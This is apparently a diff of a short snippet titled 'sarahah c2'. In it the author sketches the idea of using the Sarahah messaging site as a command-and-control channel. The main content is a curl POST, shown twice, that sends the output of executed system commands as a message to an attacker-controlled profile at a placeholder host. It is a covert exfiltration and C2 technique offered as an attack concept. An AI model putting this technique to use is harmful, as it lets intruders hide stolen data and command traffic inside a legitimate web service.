ChaitanyaHaritash · January 22, 2019 12:46
diff --git a/sarahah c2 b/sarahah c2
 Its a curl implimentation of idea i had in my mind :) i was making a python script for better demo but due to lack of time, i was
 able to make only curl payload, i hope it'll give some understanding of what i was thinking lol

 curl -i -s -k  -X 'POST' \
    -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0' -H 'Referer: https://Attacker.sarahah.com/' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' \
    -b '.AspNetCore.Antiforgery.w5W7x28NAIs=<<<CSRF Token(I guess, im not good in webapps)>>>' \
    --data-binary $'__RequestVerificationToken=<<Request Verification Token>>&userId=<<User ID of Attacker>>&text=<<System Command Execution response>>&captchaResponse=' \
    'https://Attacker.sarahah.com/Messages/SendMessage'
	Its a curl implimentation of idea i had in my mind :) i was making a python script for better demo but due to lack of time, i was
	able to make only curl payload, i hope it'll give some understanding of what i was thinking lol

	curl -i -s -k -X 'POST' \
	-H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0' -H 'Referer: https://Attacker.sarahah.com/' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' \
	-b '.AspNetCore.Antiforgery.w5W7x28NAIs=<<<CSRF Token(I guess, im not good in webapps)>>>' \
	--data-binary $'__RequestVerificationToken=<<Request Verification Token>>&userId=<<User ID of Attacker>>&text=<<System Command Execution response>>&captchaResponse=' \
	'https://Attacker.sarahah.com/Messages/SendMessage'